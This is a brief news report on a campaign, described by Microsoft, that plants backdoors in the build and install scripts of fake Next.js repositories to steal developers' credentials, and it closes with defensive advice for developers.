Malicious Next.js repositories masquerading as open source tools are trapping developers and turning everyday npm commands into silent backdoors, exposing credentials and enterprise networks.
Attackers are seeding the open source ecosystem with malicious yet legitimate-looking Next.js repositories that embed staged backdoors inside build scripts and dependencies, according to Microsoft. Once cloned, routine commands such as npm install or npm run build quietly trigger command-and-control connections.
The campaign targets software developers who regularly clone public repositories to test coding challenges, assess recruitment tasks or collaborate on open-source tools. By exploiting default trust in shared code, the attackers turn standard development behaviour into the infection vector.
The technique abuses trusted workflows in Visual Studio Code and Node.js, hiding malicious logic inside package.json scripts, dependency chains and build processes rather than using conventional malware installers. Repositories are crafted to pass casual checks, complete with realistic commit histories, documentation and comments. Payloads are often obfuscated within ordinary JavaScript modules.
Impact extends beyond a single machine. Stolen credentials, session tokens and SSH keys can provide access to private repositories, corporate networks and cloud infrastructure, enabling lateral movement across organisations.
Microsoft said the activity reflects a broader shift towards supply-chain style intrusions that treat developers as privileged entry points. The framework itself is not vulnerable; instead, attackers manipulate normal workflows and trust in open-source collaboration.
Developers are advised to verify repository sources and recruiter identities, inspect package.json and install scripts, run unfamiliar code inside virtual machines or containers, enable multi-factor authentication, and rotate credentials regularly. The episode underscores a widening trust gap in open-source software consumption and the need for stricter code provenance and dependency checks.
